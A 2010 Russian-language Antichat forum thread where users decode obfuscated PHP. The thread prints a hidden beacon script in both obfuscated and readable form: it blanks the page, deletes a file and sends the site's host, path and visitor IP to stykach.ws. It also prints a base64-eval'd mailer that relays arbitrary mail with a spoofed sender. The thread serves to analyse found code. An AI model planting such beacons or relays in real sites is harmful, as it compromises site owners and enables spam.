Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Чем расшифровать??? (https://forum.antichat.xyz/showthread.php?t=183636)

{BuT@Min} 03.03.2010 17:36
Чем расшифровать???
 
Код:
<? $x13="\x64i\162n\x61m\145"; $x14="fil\x65"; $x15="\155\153d\x69r"; $x16="\165\156\154i\156\153";
$x0b="\0600\071";$x0c="no"; if($x0c=='ok'){$x15("\x74\145\163t_o\x6b",0777);}echo "\074s\164y\x6c\x65\076\142\x6f\x64\x79\173\146\157\x6e\164\055s\151z\x65:\x30\x70\170\x3bc\x6f\x6co\162:\x23\146ff}\074/\163\164yl\x65\076"; $x0d="\150\164\164\160\072\x2f/".$x13($_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$x0e=$_SERVER['HTTP_HOST']; $x0f=$_SERVER['REMOTE_ADDR']; $x10 = array('127.0.0.1'); foreach ($x10 as $x11) { if($x11==$x0f) {}else{if($_SERVER['HTTP_HOST']==$x0f){}else{$x12 = @$x14("htt\160\x3a\057\057styk\141c\150\x2ew\163/c\157k\x5fma\x69\156\056\160\x68p?\147u\075$x0e\046\165s\145\162=$x0b\046\x69\x70=$x0f\x26f=$x0d"); $x16('rss_taib.png'); }}}?>
<? echo "\x3c\x73\164\x79\x6ce\x3e\142\157\x64y\173\146o\x6e\x74\x2d\163\x69\172\145\072\x30\160\x78\x3bc\x6fl\157\x72\x3a\x23\x66\x66\146\175</\163t\x79\x6c\145>";?>
Подскажите что тут за хитрожопость зашифрована

undef 03.03.2010 23:49
на лицо довольно грубый метод обфускации.
раскодируй строковые литералы, по смыслу переименуй переменные и получишь читаемый код. к тому же он тут крайне простой, чтобы что-то напутать

blackybr 03.03.2010 23:52
Код:
<?php
 if("no"=='ok') {
    mkdir("test_ok",0777);
 }
 echo "<style>body{font-size:0px;color:#fff}</style>";
 $ips = array('127.0.0.1');
 foreach ($ips as $ip) {
    if($ip==$_SERVER['REMOTE_ADDR']) {
 
    } else {
        if($_SERVER['HTTP_HOST']==$_SERVER['REMOTE_ADDR']){
 
        } else {
            $x12 = @file("http://stykach.ws/cok_main.php?gu={$_SERVER['HTTP_HOST']}&user=009&ip={$_SERVER['REMOTE_ADDR']}&f="."http://".dirname($_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']));
            unlink('rss_taib.png');
        }
    }
 }?>
 <? echo "<style>body{font-size:0px;color:#fff}</style>";?>

{BuT@Min} 04.03.2010 03:19
Цитата:
Сообщение от blackybr
Код:
<?php
 if("no"=='ok') {
    mkdir("test_ok",0777);
 }
 echo "<style>body{font-size:0px;color:#fff}</style>";
 $ips = array('127.0.0.1');
 foreach ($ips as $ip) {
    if($ip==$_SERVER['REMOTE_ADDR']) {
 
    } else {
        if($_SERVER['HTTP_HOST']==$_SERVER['REMOTE_ADDR']){
 
        } else {
            $x12 = @file("http://stykach.ws/cok_main.php?gu={$_SERVER['HTTP_HOST']}&user=009&ip={$_SERVER['REMOTE_ADDR']}&f="."http://".dirname($_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']));
            unlink('rss_taib.png');
        }
    }
 }?>
 <? echo "<style>body{font-size:0px;color:#fff}</style>";?>
а можно узнать чем расшифровал?
да и я не слишком силён в php этот код просто отправляет данные о сайте или ещё чтото?

Vlad&slav 04.03.2010 20:53
Увидил в теме что-то похожее. Спрошу тут. Обясните что за "кодировка" эти /x00/x01/x04/x05/ и как работакр с такими строками, как они называются, что мне гуглить, курить. Можно в лс:)

diehard 04.03.2010 20:57
Vlad&slav

гугли 16-ричную систему счисления

Tesson 14.03.2010 21:47
расшифровать нужно код :rolleyes:
PHP код:
<?php eval(base64_decode('JHRleHQgPSAkX1BPU1RbInRleHQiXTsgDQokZnJvbSA9ICRfUE9TVFsib3Rrb2dvIl07IA0KJHRvID0gJF9QT1NUWydlbWFpbCddOyANCiRzdWJqID0gJF9QT1NUWyJ0ZW1hIl07IA0KJGJvZHkgPSAiJHRleHQiOyANCiRmcm9tPSJGcm9tOiAkZnJvbVxuUmVwbHktVG86ICRmcm9tXG5YLVByaW9yaXR5OiAxXG5Db250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD1cImtvaTgtclwiXG5Db250ZW50LVRyYW5zZmVyLUVuY29kaW5nOiA4Yml0IjsgIA0KJGZyb209Y29udmVydF9jeXJfc3RyaW5nKCRmcm9tLCJ3IiwiayIpOyAgDQokdG89Y29udmVydF9jeXJfc3RyaW5nKCR0bywidyIsImsiKTsgIA0KJHN1Ymo9Y29udmVydF9jeXJfc3RyaW5nKCRzdWJqLCJ3IiwiayIpOyAgDQokYm9keT1jb252ZXJ0X2N5cl9zdHJpbmcoJGJvZHksInciLCJrIik7ICANCm1haWwoJHRvLCRzdWJqLCRib2R5LCRmcm9tKTsgIA==')); ?>

Kaimi 14.03.2010 21:51
Цитата:
расшифровать нужно код
PHP код:
<?php
$text $_POST["text"]; $from $_POST["otkogo"]; $to $_POST['email']; $subj $_POST["tema"]; $body "$text"$from="From: $from\nReply-To: $from\nX-Priority: 1\nContent-Type: text/html; charset=\"koi8-r\"\nContent-Transfer-Encoding: 8bit"$from=convert_cyr_string($from,"w","k"); $to=convert_cyr_string($to,"w","k"); $subj=convert_cyr_string($subj,"w","k"); $body=convert_cyr_string($body,"w","k"); mail($to,$subj,$body,$from); 
?>


Время: 06:44